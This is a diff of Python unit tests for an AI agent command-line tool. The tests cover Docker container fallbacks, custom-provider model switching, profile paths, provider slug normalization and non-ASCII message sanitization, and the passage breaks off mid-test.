from hermes_cli.main import _exec_in_container
|
||||
|
||||
container_info = {
|
||||
"backend": "docker",
|
||||
"container_name": "hermes-agent",
|
||||
"hermes_bin": "/data/current-package/bin/hermes",
|
||||
}
|
||||
|
||||
with patch("shutil.which", return_value="/usr/bin/docker"), \
|
||||
patch("subprocess.run") as mock_run, \
|
||||
patch("os.execvp") as mock_exec:
|
||||
mock_result = MagicMock()
|
||||
mock_result.returncode = 0
|
||||
mock_result.stdout = "false\n"
|
||||
mock_run.return_value = mock_result
|
||||
|
||||
_exec_in_container(container_info, ["chat"])
|
||||
|
||||
mock_exec.assert_not_called()
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "not running" in captured.err
|
||||
|
||||
|
||||
def test_exec_in_container_fallback_inspect_fails():
|
||||
"""Falls back when docker inspect fails entirely."""
|
||||
from hermes_cli.main import _exec_in_container
|
||||
|
||||
container_info = {
|
||||
"backend": "docker",
|
||||
"container_name": "hermes-agent",
|
||||
"hermes_bin": "/data/current-package/bin/hermes",
|
||||
}
|
||||
|
||||
with patch("shutil.which", return_value="/usr/bin/docker"), \
|
||||
patch("subprocess.run") as mock_run, \
|
||||
patch("os.execvp") as mock_exec:
|
||||
mock_result = MagicMock()
|
||||
mock_result.returncode = 1
|
||||
mock_result.stdout = ""
|
||||
mock_run.return_value = mock_result
|
||||
|
||||
_exec_in_container(container_info, ["chat"])
|
||||
|
||||
mock_exec.assert_not_called()
|
||||
@@ -0,0 +1,124 @@
|
||||
"""Tests that `hermes model` always shows the model selection menu for custom
|
||||
providers, even when a model is already saved.
|
||||
|
||||
Regression test for the bug where _model_flow_named_custom() returned
|
||||
immediately when provider_info had a saved ``model`` field, making it
|
||||
impossible to switch models on multi-model endpoints.
|
||||
"""
|
||||
|
||||
import os
|
||||
from unittest.mock import patch, MagicMock, call
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def config_home(tmp_path, monkeypatch):
|
||||
"""Isolated HERMES_HOME with a minimal config."""
|
||||
home = tmp_path / "hermes"
|
||||
home.mkdir()
|
||||
config_yaml = home / "config.yaml"
|
||||
config_yaml.write_text("model: old-model\ncustom_providers: []\n")
|
||||
env_file = home / ".env"
|
||||
env_file.write_text("")
|
||||
monkeypatch.setenv("HERMES_HOME", str(home))
|
||||
monkeypatch.delenv("HERMES_MODEL", raising=False)
|
||||
monkeypatch.delenv("LLM_MODEL", raising=False)
|
||||
monkeypatch.delenv("HERMES_INFERENCE_PROVIDER", raising=False)
|
||||
monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENAI_API_KEY", raising=False)
|
||||
return home
|
||||
|
||||
|
||||
class TestCustomProviderModelSwitch:
|
||||
"""Ensure _model_flow_named_custom always probes and shows menu."""
|
||||
|
||||
def test_saved_model_still_probes_endpoint(self, config_home):
|
||||
"""When a model is already saved, the function must still call
|
||||
fetch_api_models to probe the endpoint — not skip with early return."""
|
||||
from hermes_cli.main import _model_flow_named_custom
|
||||
|
||||
provider_info = {
|
||||
"name": "My vLLM",
|
||||
"base_url": "https://vllm.example.com/v1",
|
||||
"api_key": "sk-test",
|
||||
"model": "model-A", # already saved
|
||||
}
|
||||
|
||||
with patch("hermes_cli.models.fetch_api_models", return_value=["model-A", "model-B"]) as mock_fetch, \
|
||||
patch.dict("sys.modules", {"simple_term_menu": None}), \
|
||||
patch("builtins.input", return_value="2"), \
|
||||
patch("builtins.print"):
|
||||
_model_flow_named_custom({}, provider_info)
|
||||
|
||||
# fetch_api_models MUST be called even though model was saved
|
||||
mock_fetch.assert_called_once_with("sk-test", "https://vllm.example.com/v1", timeout=8.0)
|
||||
|
||||
def test_can_switch_to_different_model(self, config_home):
|
||||
"""User selects a different model than the saved one."""
|
||||
import yaml
|
||||
from hermes_cli.main import _model_flow_named_custom
|
||||
|
||||
provider_info = {
|
||||
"name": "My vLLM",
|
||||
"base_url": "https://vllm.example.com/v1",
|
||||
"api_key": "sk-test",
|
||||
"model": "model-A",
|
||||
}
|
||||
|
||||
with patch("hermes_cli.models.fetch_api_models", return_value=["model-A", "model-B"]), \
|
||||
patch.dict("sys.modules", {"simple_term_menu": None}), \
|
||||
patch("builtins.input", return_value="2"), \
|
||||
patch("builtins.print"):
|
||||
_model_flow_named_custom({}, provider_info)
|
||||
|
||||
config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
|
||||
model = config.get("model")
|
||||
assert isinstance(model, dict)
|
||||
assert model["default"] == "model-B"
|
||||
|
||||
def test_probe_failure_falls_back_to_saved(self, config_home):
|
||||
"""When endpoint probe fails and user presses Enter, saved model is used."""
|
||||
import yaml
|
||||
from hermes_cli.main import _model_flow_named_custom
|
||||
|
||||
provider_info = {
|
||||
"name": "My vLLM",
|
||||
"base_url": "https://vllm.example.com/v1",
|
||||
"api_key": "sk-test",
|
||||
"model": "model-A",
|
||||
}
|
||||
|
||||
# fetch returns empty list (probe failed), user presses Enter (empty input)
|
||||
with patch("hermes_cli.models.fetch_api_models", return_value=[]), \
|
||||
patch("builtins.input", return_value=""), \
|
||||
patch("builtins.print"):
|
||||
_model_flow_named_custom({}, provider_info)
|
||||
|
||||
config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
|
||||
model = config.get("model")
|
||||
assert isinstance(model, dict)
|
||||
assert model["default"] == "model-A"
|
||||
|
||||
def test_no_saved_model_still_works(self, config_home):
|
||||
"""First-time flow (no saved model) still works as before."""
|
||||
import yaml
|
||||
from hermes_cli.main import _model_flow_named_custom
|
||||
|
||||
provider_info = {
|
||||
"name": "My vLLM",
|
||||
"base_url": "https://vllm.example.com/v1",
|
||||
"api_key": "sk-test",
|
||||
# no "model" key
|
||||
}
|
||||
|
||||
with patch("hermes_cli.models.fetch_api_models", return_value=["model-X"]), \
|
||||
patch.dict("sys.modules", {"simple_term_menu": None}), \
|
||||
patch("builtins.input", return_value="1"), \
|
||||
patch("builtins.print"):
|
||||
_model_flow_named_custom({}, provider_info)
|
||||
|
||||
config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
|
||||
model = config.get("model")
|
||||
assert isinstance(model, dict)
|
||||
assert model["default"] == "model-X"
|
||||
@@ -755,6 +755,7 @@ class TestProfileArg:
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
result = gateway_cli._profile_arg(str(hermes_home))
|
||||
assert result == ""
|
||||
|
||||
@@ -763,6 +764,7 @@ class TestProfileArg:
|
||||
profile_dir = tmp_path / ".hermes" / "profiles" / "mybot"
|
||||
profile_dir.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
|
||||
result = gateway_cli._profile_arg(str(profile_dir))
|
||||
assert result == "--profile mybot"
|
||||
|
||||
@@ -771,6 +773,7 @@ class TestProfileArg:
|
||||
custom_home = tmp_path / "custom" / "hermes"
|
||||
custom_home.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
|
||||
result = gateway_cli._profile_arg(str(custom_home))
|
||||
assert result == ""
|
||||
|
||||
@@ -779,6 +782,7 @@ class TestProfileArg:
|
||||
nested = tmp_path / ".hermes" / "profiles" / "mybot" / "subdir"
|
||||
nested.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
|
||||
result = gateway_cli._profile_arg(str(nested))
|
||||
assert result == ""
|
||||
|
||||
@@ -787,6 +791,7 @@ class TestProfileArg:
|
||||
bad_profile = tmp_path / ".hermes" / "profiles" / "My Bot!"
|
||||
bad_profile.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
|
||||
result = gateway_cli._profile_arg(str(bad_profile))
|
||||
assert result == ""
|
||||
|
||||
|
||||
@@ -102,6 +102,21 @@ class TestAggregatorProviders:
|
||||
assert result == "anthropic/claude-sonnet-4.6"
|
||||
|
||||
|
||||
class TestIssue6211NativeProviderPrefixNormalization:
|
||||
@pytest.mark.parametrize("model,target_provider,expected", [
|
||||
("zai/glm-5.1", "zai", "glm-5.1"),
|
||||
("google/gemini-2.5-pro", "gemini", "google/gemini-2.5-pro"),
|
||||
("moonshot/kimi-k2.5", "kimi-coding", "kimi-k2.5"),
|
||||
("anthropic/claude-sonnet-4.6", "openrouter", "anthropic/claude-sonnet-4.6"),
|
||||
("Qwen/Qwen3.5-397B-A17B", "huggingface", "Qwen/Qwen3.5-397B-A17B"),
|
||||
("modal/zai-org/GLM-5-FP8", "custom", "modal/zai-org/GLM-5-FP8"),
|
||||
])
|
||||
def test_native_provider_prefixes_are_only_stripped_on_matching_provider(
|
||||
self, model, target_provider, expected
|
||||
):
|
||||
assert normalize_model_for_provider(model, target_provider) == expected
|
||||
|
||||
|
||||
# ── detect_vendor ──────────────────────────────────────────────────────
|
||||
|
||||
class TestDetectVendor:
|
||||
|
||||
@@ -0,0 +1,33 @@
|
||||
"""Test that opencode-go appears in /model list when credentials are set."""
|
||||
|
||||
import os
|
||||
from unittest.mock import patch
|
||||
|
||||
from hermes_cli.model_switch import list_authenticated_providers
|
||||
|
||||
|
||||
@patch.dict(os.environ, {"OPENCODE_GO_API_KEY": "test-key"}, clear=False)
|
||||
def test_opencode_go_appears_when_api_key_set():
|
||||
"""opencode-go should appear in list_authenticated_providers when OPENCODE_GO_API_KEY is set."""
|
||||
providers = list_authenticated_providers(current_provider="openrouter")
|
||||
|
||||
# Find opencode-go in results
|
||||
opencode_go = next((p for p in providers if p["slug"] == "opencode-go"), None)
|
||||
|
||||
assert opencode_go is not None, "opencode-go should appear when OPENCODE_GO_API_KEY is set"
|
||||
assert opencode_go["models"] == ["glm-5", "kimi-k2.5", "mimo-v2-pro", "mimo-v2-omni", "minimax-m2.7", "minimax-m2.5"]
|
||||
# opencode-go is in PROVIDER_TO_MODELS_DEV, so it appears as "built-in" (Part 1)
|
||||
assert opencode_go["source"] == "built-in"
|
||||
|
||||
|
||||
def test_opencode_go_not_appears_when_no_creds():
|
||||
"""opencode-go should NOT appear when no credentials are set."""
|
||||
# Ensure OPENCODE_GO_API_KEY is not set
|
||||
env_without_key = {k: v for k, v in os.environ.items() if k != "OPENCODE_GO_API_KEY"}
|
||||
|
||||
with patch.dict(os.environ, env_without_key, clear=True):
|
||||
providers = list_authenticated_providers(current_provider="openrouter")
|
||||
|
||||
# opencode-go should not be in results
|
||||
opencode_go = next((p for p in providers if p["slug"] == "opencode-go"), None)
|
||||
assert opencode_go is None, "opencode-go should not appear without credentials"
|
||||
@@ -0,0 +1,83 @@
|
||||
"""Test that overlay providers with mismatched models.dev keys resolve correctly.
|
||||
|
||||
HERMES_OVERLAYS keys may be models.dev IDs (e.g. "github-copilot") while
|
||||
_PROVIDER_MODELS and config.yaml use Hermes IDs ("copilot"). The slug
|
||||
resolution in list_authenticated_providers() Section 2 must bridge this gap.
|
||||
|
||||
Covers: #5223, #6492
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from hermes_cli.model_switch import list_authenticated_providers
|
||||
|
||||
|
||||
# -- Copilot slug resolution (env var path) ----------------------------------
|
||||
|
||||
@patch.dict(os.environ, {"COPILOT_GITHUB_TOKEN": "fake-ghu"}, clear=False)
|
||||
def test_copilot_uses_hermes_slug():
|
||||
"""github-copilot overlay should resolve to slug='copilot' with curated models."""
|
||||
providers = list_authenticated_providers(current_provider="copilot")
|
||||
|
||||
copilot = next((p for p in providers if p["slug"] == "copilot"), None)
|
||||
assert copilot is not None, "copilot should appear when COPILOT_GITHUB_TOKEN is set"
|
||||
assert copilot["total_models"] > 0, "copilot should have curated models"
|
||||
assert copilot["is_current"] is True
|
||||
|
||||
# Must NOT appear under the models.dev key
|
||||
gh_copilot = next((p for p in providers if p["slug"] == "github-copilot"), None)
|
||||
assert gh_copilot is None, "github-copilot slug should not appear (resolved to copilot)"
|
||||
|
||||
|
||||
@patch.dict(os.environ, {"COPILOT_GITHUB_TOKEN": "fake-ghu"}, clear=False)
|
||||
def test_copilot_no_duplicate_entries():
|
||||
"""Copilot must appear only once — not as both 'copilot' (section 1) and 'github-copilot' (section 2)."""
|
||||
providers = list_authenticated_providers(current_provider="copilot")
|
||||
|
||||
copilot_slugs = [p["slug"] for p in providers if "copilot" in p["slug"]]
|
||||
# Should have at most one copilot entry (may also have copilot-acp if creds exist)
|
||||
copilot_main = [s for s in copilot_slugs if s == "copilot"]
|
||||
assert len(copilot_main) == 1, f"Expected exactly one 'copilot' entry, got {copilot_main}"
|
||||
|
||||
|
||||
# -- kimi-for-coding alias in auth.py ----------------------------------------
|
||||
|
||||
def test_kimi_for_coding_alias():
|
||||
"""resolve_provider('kimi-for-coding') should return 'kimi-coding'."""
|
||||
from hermes_cli.auth import resolve_provider
|
||||
|
||||
result = resolve_provider("kimi-for-coding")
|
||||
assert result == "kimi-coding"
|
||||
|
||||
|
||||
# -- Generic slug mismatch providers -----------------------------------------
|
||||
|
||||
@patch.dict(os.environ, {"KIMI_API_KEY": "fake-key"}, clear=False)
|
||||
def test_kimi_for_coding_overlay_uses_hermes_slug():
|
||||
"""kimi-for-coding overlay should resolve to slug='kimi-coding'."""
|
||||
providers = list_authenticated_providers(current_provider="kimi-coding")
|
||||
|
||||
kimi = next((p for p in providers if p["slug"] == "kimi-coding"), None)
|
||||
assert kimi is not None, "kimi-coding should appear when KIMI_API_KEY is set"
|
||||
assert kimi["is_current"] is True
|
||||
|
||||
# Must NOT appear under the models.dev key
|
||||
kimi_mdev = next((p for p in providers if p["slug"] == "kimi-for-coding"), None)
|
||||
assert kimi_mdev is None, "kimi-for-coding slug should not appear (resolved to kimi-coding)"
|
||||
|
||||
|
||||
@patch.dict(os.environ, {"KILOCODE_API_KEY": "fake-key"}, clear=False)
|
||||
def test_kilo_overlay_uses_hermes_slug():
|
||||
"""kilo overlay should resolve to slug='kilocode'."""
|
||||
providers = list_authenticated_providers(current_provider="kilocode")
|
||||
|
||||
kilo = next((p for p in providers if p["slug"] == "kilocode"), None)
|
||||
assert kilo is not None, "kilocode should appear when KILOCODE_API_KEY is set"
|
||||
assert kilo["is_current"] is True
|
||||
|
||||
kilo_mdev = next((p for p in providers if p["slug"] == "kilo"), None)
|
||||
assert kilo_mdev is None, "kilo slug should not appear (resolved to kilocode)"
|
||||
@@ -293,12 +293,16 @@ class TestGetActiveProfileName:
|
||||
monkeypatch.setenv("HERMES_HOME", str(profile_dir))
|
||||
assert get_active_profile_name() == "coder"
|
||||
|
||||
def test_custom_path_returns_custom(self, profile_env, monkeypatch):
|
||||
def test_custom_path_returns_default(self, profile_env, monkeypatch):
|
||||
"""A custom HERMES_HOME (Docker, etc.) IS the default root."""
|
||||
tmp_path = profile_env
|
||||
custom = tmp_path / "some" / "other" / "path"
|
||||
custom.mkdir(parents=True)
|
||||
monkeypatch.setenv("HERMES_HOME", str(custom))
|
||||
assert get_active_profile_name() == "custom"
|
||||
# With Docker-aware roots, a custom HERMES_HOME is the default —
|
||||
# not "custom". The user is on the default profile of their
|
||||
# custom deployment.
|
||||
assert get_active_profile_name() == "default"
|
||||
|
||||
|
||||
# ===================================================================
|
||||
@@ -706,6 +710,72 @@ class TestInternalHelpers:
|
||||
home = _get_default_hermes_home()
|
||||
assert home == tmp_path / ".hermes"
|
||||
|
||||
def test_profiles_root_docker_deployment(self, tmp_path, monkeypatch):
|
||||
"""In Docker (HERMES_HOME outside ~/.hermes), profiles go under HERMES_HOME."""
|
||||
docker_home = tmp_path / "opt" / "data"
|
||||
docker_home.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(docker_home))
|
||||
root = _get_profiles_root()
|
||||
assert root == docker_home / "profiles"
|
||||
|
||||
def test_default_hermes_home_docker(self, tmp_path, monkeypatch):
|
||||
"""In Docker, _get_default_hermes_home() returns HERMES_HOME itself."""
|
||||
docker_home = tmp_path / "opt" / "data"
|
||||
docker_home.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(docker_home))
|
||||
home = _get_default_hermes_home()
|
||||
assert home == docker_home
|
||||
|
||||
def test_profiles_root_profile_mode(self, tmp_path, monkeypatch):
|
||||
"""In profile mode (HERMES_HOME under ~/.hermes), profiles root is still ~/.hermes/profiles."""
|
||||
native = tmp_path / ".hermes"
|
||||
profile_dir = native / "profiles" / "coder"
|
||||
profile_dir.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(profile_dir))
|
||||
root = _get_profiles_root()
|
||||
assert root == native / "profiles"
|
||||
|
||||
def test_active_profile_path_docker(self, tmp_path, monkeypatch):
|
||||
"""In Docker, active_profile file lives under HERMES_HOME."""
|
||||
from hermes_cli.profiles import _get_active_profile_path
|
||||
docker_home = tmp_path / "opt" / "data"
|
||||
docker_home.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(docker_home))
|
||||
path = _get_active_profile_path()
|
||||
assert path == docker_home / "active_profile"
|
||||
|
||||
def test_create_profile_docker(self, tmp_path, monkeypatch):
|
||||
"""Profile created in Docker lands under HERMES_HOME/profiles/."""
|
||||
docker_home = tmp_path / "opt" / "data"
|
||||
docker_home.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(docker_home))
|
||||
result = create_profile("orchestrator", no_alias=True)
|
||||
expected = docker_home / "profiles" / "orchestrator"
|
||||
assert result == expected
|
||||
assert expected.is_dir()
|
||||
|
||||
def test_active_profile_name_docker_default(self, tmp_path, monkeypatch):
|
||||
"""In Docker (no profile active), get_active_profile_name() returns 'default'."""
|
||||
docker_home = tmp_path / "opt" / "data"
|
||||
docker_home.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(docker_home))
|
||||
assert get_active_profile_name() == "default"
|
||||
|
||||
def test_active_profile_name_docker_profile(self, tmp_path, monkeypatch):
|
||||
"""In Docker with a profile active, get_active_profile_name() returns the profile name."""
|
||||
docker_home = tmp_path / "opt" / "data"
|
||||
profile = docker_home / "profiles" / "orchestrator"
|
||||
profile.mkdir(parents=True)
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(profile))
|
||||
assert get_active_profile_name() == "orchestrator"
|
||||
|
||||
|
||||
# ===================================================================
|
||||
# Edge cases and additional coverage
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
"""Tests for the update check mechanism in hermes_cli.banner."""
|
||||
|
||||
import json
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
@@ -144,7 +145,8 @@ def test_invalidate_update_cache_clears_all_profiles(tmp_path):
|
||||
p.mkdir(parents=True)
|
||||
(p / ".update_check").write_text('{"ts":1,"behind":50}')
|
||||
|
||||
with patch.object(Path, "home", return_value=tmp_path):
|
||||
with patch.object(Path, "home", return_value=tmp_path), \
|
||||
patch.dict(os.environ, {"HERMES_HOME": str(default_home)}):
|
||||
_invalidate_update_cache()
|
||||
|
||||
# All three caches should be gone
|
||||
@@ -161,7 +163,8 @@ def test_invalidate_update_cache_no_profiles_dir(tmp_path):
|
||||
default_home.mkdir()
|
||||
(default_home / ".update_check").write_text('{"ts":1,"behind":5}')
|
||||
|
||||
with patch.object(Path, "home", return_value=tmp_path):
|
||||
with patch.object(Path, "home", return_value=tmp_path), \
|
||||
patch.dict(os.environ, {"HERMES_HOME": str(default_home)}):
|
||||
_invalidate_update_cache()
|
||||
|
||||
assert not (default_home / ".update_check").exists()
|
||||
|
||||
@@ -9,7 +9,9 @@ Covers three static methods on AIAgent (inspired by PR #1321 — @alireza78a):
|
||||
import types
|
||||
|
||||
from run_agent import AIAgent
|
||||
from tools.delegate_tool import MAX_CONCURRENT_CHILDREN
|
||||
from tools.delegate_tool import _get_max_concurrent_children
|
||||
|
||||
MAX_CONCURRENT_CHILDREN = _get_max_concurrent_children()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -113,6 +113,25 @@ class TestTryActivateFallback:
|
||||
assert agent.provider == "zai"
|
||||
assert agent.client is mock_client
|
||||
|
||||
def test_fallback_uses_resolved_normalized_model(self):
|
||||
agent = _make_agent(
|
||||
fallback_model={"provider": "zai", "model": "zai/glm-5.1"},
|
||||
)
|
||||
mock_client = _mock_resolve(
|
||||
api_key="sk-zai-key",
|
||||
base_url="https://api.z.ai/api/paas/v4",
|
||||
)
|
||||
with patch(
|
||||
"agent.auxiliary_client.resolve_provider_client",
|
||||
return_value=(mock_client, "glm-5.1"),
|
||||
):
|
||||
result = agent._try_activate_fallback()
|
||||
|
||||
assert result is True
|
||||
assert agent.model == "glm-5.1"
|
||||
assert agent.provider == "zai"
|
||||
assert agent.client is mock_client
|
||||
|
||||
def test_activates_kimi_fallback(self):
|
||||
agent = _make_agent(
|
||||
fallback_model={"provider": "kimi-coding", "model": "kimi-k2.5"},
|
||||
|
||||
@@ -138,6 +138,48 @@ def test_aiagent_reuses_existing_errors_log_handler():
|
||||
root_logger.addHandler(handler)
|
||||
|
||||
|
||||
class TestProviderModelNormalization:
|
||||
def test_aiagent_strips_matching_native_provider_prefix(self):
|
||||
with (
|
||||
patch(
|
||||
"run_agent.get_tool_definitions", return_value=_make_tool_defs("web_search")
|
||||
),
|
||||
patch("run_agent.check_toolset_requirements", return_value={}),
|
||||
patch("run_agent.OpenAI"),
|
||||
):
|
||||
agent = AIAgent(
|
||||
model="zai/glm-5.1",
|
||||
provider="zai",
|
||||
base_url="https://api.z.ai/api/paas/v4",
|
||||
api_key="test-key-1234567890",
|
||||
quiet_mode=True,
|
||||
skip_context_files=True,
|
||||
skip_memory=True,
|
||||
)
|
||||
|
||||
assert agent.model == "glm-5.1"
|
||||
|
||||
def test_aiagent_keeps_aggregator_vendor_slug(self):
|
||||
with (
|
||||
patch(
|
||||
"run_agent.get_tool_definitions", return_value=_make_tool_defs("web_search")
|
||||
),
|
||||
patch("run_agent.check_toolset_requirements", return_value={}),
|
||||
patch("run_agent.OpenAI"),
|
||||
):
|
||||
agent = AIAgent(
|
||||
model="anthropic/claude-sonnet-4.6",
|
||||
provider="openrouter",
|
||||
base_url="https://openrouter.ai/api/v1",
|
||||
api_key="test-key-1234567890",
|
||||
quiet_mode=True,
|
||||
skip_context_files=True,
|
||||
skip_memory=True,
|
||||
)
|
||||
|
||||
assert agent.model == "anthropic/claude-sonnet-4.6"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helper to build mock assistant messages (API response objects)
|
||||
# ---------------------------------------------------------------------------
|
||||
@@ -2083,6 +2125,28 @@ class TestRetryExhaustion:
|
||||
assert "error" in result
|
||||
assert "rate limited" in result["error"]
|
||||
|
||||
def test_build_api_kwargs_error_no_unbound_local(self, agent):
|
||||
"""When _build_api_kwargs raises, except handler must not crash with UnboundLocalError.
|
||||
|
||||
Regression: _dump_api_request_debug(api_kwargs, ...) in the except block
|
||||
referenced api_kwargs before it was assigned when _build_api_kwargs threw.
|
||||
"""
|
||||
self._setup_agent(agent)
|
||||
with (
|
||||
patch.object(agent, "_build_api_kwargs", side_effect=ValueError("bad messages")),
|
||||
patch.object(agent, "_persist_session"),
|
||||
patch.object(agent, "_save_trajectory"),
|
||||
patch.object(agent, "_cleanup_task_resources"),
|
||||
patch("run_agent.time", self._make_fast_time_mock()),
|
||||
):
|
||||
result = agent.run_conversation("hello")
|
||||
# Must surface the real error, not UnboundLocalError
|
||||
assert result.get("completed") is False
|
||||
assert result.get("failed") is True
|
||||
assert "error" in result
|
||||
assert "UnboundLocalError" not in result.get("error", "")
|
||||
assert "bad messages" in result["error"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Flush sentinel leak
|
||||
|
||||
@@ -0,0 +1,74 @@
|
||||
"""Tests that switch_model preserves config_context_length."""
|
||||
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
from run_agent import AIAgent
|
||||
from agent.context_compressor import ContextCompressor
|
||||
|
||||
|
||||
def _make_agent_with_compressor(config_context_length=None) -> AIAgent:
|
||||
"""Build a minimal AIAgent with a context_compressor, skipping __init__."""
|
||||
agent = AIAgent.__new__(AIAgent)
|
||||
|
||||
# Primary model settings
|
||||
agent.model = "primary-model"
|
||||
agent.provider = "openrouter"
|
||||
agent.base_url = "https://openrouter.ai/api/v1"
|
||||
agent.api_key = "sk-primary"
|
||||
agent.api_mode = "chat_completions"
|
||||
agent.client = MagicMock()
|
||||
agent.quiet_mode = True
|
||||
|
||||
# Store config_context_length for later use in switch_model
|
||||
agent._config_context_length = config_context_length
|
||||
|
||||
# Context compressor with primary model values
|
||||
compressor = ContextCompressor(
|
||||
model="primary-model",
|
||||
threshold_percent=0.50,
|
||||
base_url="https://openrouter.ai/api/v1",
|
||||
api_key="sk-primary",
|
||||
provider="openrouter",
|
||||
quiet_mode=True,
|
||||
config_context_length=config_context_length,
|
||||
)
|
||||
agent.context_compressor = compressor
|
||||
|
||||
# For switch_model
|
||||
agent._primary_runtime = {}
|
||||
|
||||
return agent
|
||||
|
||||
|
||||
@patch("agent.model_metadata.get_model_context_length", return_value=131_072)
|
||||
def test_switch_model_preserves_config_context_length(mock_ctx_len):
|
||||
"""When switching models, config_context_length should be passed to get_model_context_length."""
|
||||
agent = _make_agent_with_compressor(config_context_length=32_768)
|
||||
|
||||
assert agent.context_compressor.model == "primary-model"
|
||||
assert agent.context_compressor.context_length == 32_768 # From config override
|
||||
|
||||
# Switch model
|
||||
agent.switch_model("new-model", "openrouter", api_key="sk-new", base_url="https://openrouter.ai/api/v1")
|
||||
|
||||
# Verify get_model_context_length was called with config_context_length
|
||||
mock_ctx_len.assert_called_once()
|
||||
call_kwargs = mock_ctx_len.call_args.kwargs
|
||||
assert call_kwargs.get("config_context_length") == 32_768
|
||||
|
||||
# Verify compressor was updated
|
||||
assert agent.context_compressor.model == "new-model"
|
||||
|
||||
|
||||
def test_switch_model_without_config_context_length():
|
||||
"""When switching models without config override, config_context_length should be None."""
|
||||
agent = _make_agent_with_compressor(config_context_length=None)
|
||||
|
||||
with patch("agent.model_metadata.get_model_context_length", return_value=128_000) as mock_ctx_len:
|
||||
# Switch model
|
||||
agent.switch_model("new-model", "openrouter", api_key="sk-new", base_url="https://openrouter.ai/api/v1")
|
||||
|
||||
# Verify get_model_context_length was called with None
|
||||
mock_ctx_len.assert_called_once()
|
||||
call_kwargs = mock_ctx_len.call_args.kwargs
|
||||
assert call_kwargs.get("config_context_length") is None
|
||||
@@ -0,0 +1,140 @@
|
||||
"""Tests for UnicodeEncodeError recovery with ASCII codec.
|
||||
|
||||
Covers the fix for issue #6843 — systems with ASCII locale (LANG=C)
|
||||
that can't encode non-ASCII characters in API request payloads.
|
||||
"""
|
||||
|
||||
import pytest
|
||||
|
||||
from run_agent import (
|
||||
_strip_non_ascii,
|
||||
_sanitize_messages_non_ascii,
|
||||
_sanitize_messages_surrogates,
|
||||
)
|
||||
|
||||
|
||||
class TestStripNonAscii:
|
||||
"""Tests for _strip_non_ascii helper."""
|
||||
|
||||
def test_ascii_only(self):
|
||||
assert _strip_non_ascii("hello world") == "hello world"
|
||||
|
||||
def test_removes_non_ascii(self):
|
||||
assert _strip_non_ascii("hello ⚕ world") == "hello world"
|
||||
|
||||
def test_removes_emoji(self):
|
||||
assert _strip_non_ascii("test 🤖 done") == "test done"
|
||||
|
||||
def test_chinese_chars(self):
|
||||
assert _strip_non_ascii("你好world") == "world"
|
||||
|
||||
def test_empty_string(self):
|
||||
assert _strip_non_ascii("") == ""
|
||||
|
||||
def test_only_non_ascii(self):
|
||||
assert _strip_non_ascii("⚕🤖") == ""
|
||||
|
||||
|
||||
class TestSanitizeMessagesNonAscii:
|
||||
"""Tests for _sanitize_messages_non_ascii."""
|
||||
|
||||
def test_no_change_ascii_only(self):
|
||||
messages = [{"role": "user", "content": "hello"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is False
|
||||
assert messages[0]["content"] == "hello"
|
||||
|
||||
def test_sanitizes_content_string(self):
|
||||
messages = [{"role": "user", "content": "hello ⚕ world"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["content"] == "hello world"
|
||||
|
||||
def test_sanitizes_content_list(self):
|
||||
messages = [{
|
||||
"role": "user",
|
||||
"content": [{"type": "text", "text": "hello 🤖"}]
|
||||
}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["content"][0]["text"] == "hello "
|
||||
|
||||
def test_sanitizes_name_field(self):
|
||||
messages = [{"role": "tool", "name": "⚕tool", "content": "ok"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["name"] == "tool"
|
||||
|
||||
def test_sanitizes_tool_calls(self):
|
||||
messages = [{
|
||||
"role": "assistant",
|
||||
"content": None,
|
||||
"tool_calls": [{
|
||||
"id": "call_1",
|
||||
"type": "function",
|
||||
"function": {
|
||||
